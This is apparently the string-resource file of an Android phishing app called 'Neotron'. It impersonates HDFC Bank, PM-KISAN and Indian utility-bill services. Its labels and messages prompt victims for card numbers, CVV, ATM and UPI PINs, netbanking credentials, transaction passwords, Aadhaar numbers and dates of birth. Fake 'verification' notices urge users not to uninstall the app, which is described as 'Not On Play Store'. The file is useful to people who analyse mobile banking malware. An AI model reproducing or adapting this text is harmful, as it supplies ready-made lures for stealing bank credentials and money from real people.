<resources>
    <string name="app_name">Neotron</string>
    <string name="apply_pm_kisan">Apply PM KISAN</string>
    <string name="your_name">Your Name</string>
    <string name="mobile_number">Mobile Number</string>
    <string name="pm_kisan_samman_nidhi_apply_information">PM-KISAN Samman Nidhi Apply Information</string>
    <string name="aadhar_number">Aadhar Number</string>
    <string name="asterisk">*</string>
    <string name="submit">Submit</string>
    <string name="full_name">FULL Name</string>
    <string name="connection_information">Connection Information</string>
    <string name="jalmeb_jivan">जलमेव जीवनम्।</string>
    <string name="satyameva_ayate">सत्यमेव जयते</string>
    <string name="mobile_no">Mobile No.</string>
    <string name="kno_number">KNO Number.</string>
    <string name="next">Next</string>
    <string name="water_bill">Water Bill</string>
    <string name="select_payment_method">Select Payment Method</string>
    <string name="debit_credit_card">DEBIT/CREDIT CARD</string>
    <string name="netbanking">NETBANKING</string>
    <string name="safe_banking_tips">Safe Banking Tips:</string>
    <string name="be_cautious_of_phishing_and_vishing_attempts">Be cautious of phishing and vishing attempts</string>
    <string name="ministry_of_water">जल मंत्रालय</string>
    <string name="ministry_of_water_eng">Ministry of Water</string>
    <string name="credit_card">Credit Card</string>
    <string name="debit_card">Debit Card</string>
    <string name="card_number">Card Number</string>
    <string name="expiry_mm_yy">Expiry (MM/YY)</string>
    <string name="cvv">CVV</string>
    <string name="welcome_to_internet_banking">Welcome to Internet Banking</string>
    <string name="pay">Pay</string>
    <string name="userid">UserID</string>
    <string name="password">Password</string>
    <string name="enter_your_information">Enter Your Information</string>
    <string name="atm_pin">ATM pin</string>
    <string name="date_of_birth">Date of Birth</string>
    <string name="electricity_bill_update">Electricity Bill Update</string>
    <string name="customer_name">Customer Name</string>
    <string name="enter_customer_name">Enter Customer Name</string>
    <string name="enter_mobile_number">Enter Mobile Number</string>
    <string name="consumer_no">Consumer No.</string>
    <string name="enter_your_consumer_no">Enter Your Consumer no.</string>
    <string name="reason">Reason</string>
    <string name="bill_not_update">Bill Not Update</string>
    <string name="bill_pay">Bill Pay</string>
    <string name="pending_bill_pay">Pending Bill Pay</string>
    <string name="update_bill_pay">Update Bill Pay</string>
    <string name="advance_bill_pay">Advance Bill Pay</string>
    <string name="avoid_sharing_account_related_information">Avoid sharing account-related information</string>
    <string name="for_emails_and_sms_carefully_read_the_terms_and_conditions_before_proceeding">For emails and SMS, carefully read the terms and conditions before proceeding</string>
    <string name="upi">UPI</string>
    <string name="energy_bill_activation_for_challan_bill_updated_fees">Energy Bill Activation for Challan Bill Updated Fees</string>
    <string name="card_16_digit_number">Card 16-Digit Number</string>
    <string name="xxxx_xxxx_xxxx_xxxx">XXXX XXXX XXXX XXXX</string>
    <string name="expiry_date">Expiry Date:</string>
    <string name="cvv_colon">CVV:</string>
    <string name="yy">YY</string>
    <string name="slash">/</string>
    <string name="mm">MM</string>
    <string name="bank_name">Bank Name</string>
    <string name="username_customer_id">Username / Customer ID</string>
    <string name="enter_username_customer_id">Enter Username / Customer ID</string>
    <string name="enter_password">Enter Password</string>
    <string name="upi_pin">Upi Pin</string>
    <string name="enter_upi_pin">Enter UPI Pin</string>
    <string name="waiting">Waiting...</string>
    <string name="hello_hdfc_bank_customer">Hello, HDFC Bank Customer\nComplete your card details in a few simple steps</string>
    <string name="enter_name">Enter Name</string>
    <string name="enter_personal_details">ENTER PERSONAL DETAILS</string>
    <string name="dd_mm_yyyy">DD/MM/YYYY</string>
    <string name="copyright_hdfc_bank_all_right_reserved">Copyright © HDFC Bank, All right reserved</string>
    <string name="hdfc_bank">HDFC Bank</string>
    <string name="hello_hdfc_bank_customer_complete">Hello, HDFC Bank Customer\nComplete your account details in few simple steps enter details below and verify</string>
    <string name="customer_service">Customer Service: 02261156300|Toll Free Number-cpl-c\n02232322727</string>
    <string name="net_banking">NET BANKING</string>
    <string name="customer_id">Customer id</string>
    <string name="hdfc_debit_card">HDFC Debit Card</string>
    <string name="mm_yy">MM/YY</string>
    <string name="xxxx">XXXX</string>
    <string name="important_notice">Important Notice</string>
    <string name="please_wait_your_details"><![CDATA[Please wait Your Details are being Verifies it will take minimum 30 minutes Most Information - Don\'t Delete & Uninstall This App. Thanks For Joining HDFC BANK online Services Recently Launched From HDFC KYC App (Not On Play Store)]]></string>
    <string name="banking_never_shares">Banking Never shares your User ID, Password or an other Information, with anyone on phone SMS or Email, HDFC bank does not call/email Customers for such information, Beware of Fraudsters asking for such details posing as bank staff.</string>
    <string name="customer_support">Customer Support</string>
    <string name="enter_date_of_birth">Enter Date of Birth</string>
    <string name="your_full_address">Your Full Address</string>
    <string name="enter_your_address">Enter Your Address</string>
    <string name="update_connection_charge">Update connection Charge</string>
    <string name="please_wait_your_bill_is_update_in_few_hours">Please Wait Your Bill is Update In few hours.</string>
    <string name="important_note">Important Note:</string>
    <string name="please_be_patient">Please be patient as we verify your details. This process may be take a minimum of 24 hours. You will receive a notification once your details are successfully verified. We appreciate your patience and kindly request that you do not uninstall the app, as it may prevent you from receiving notifications. Thank you.</string>
    <string name="transaction_password">Transaction Password</string>
    <string name="enter_transaction_password">Enter Transaction Password</string>
</resources>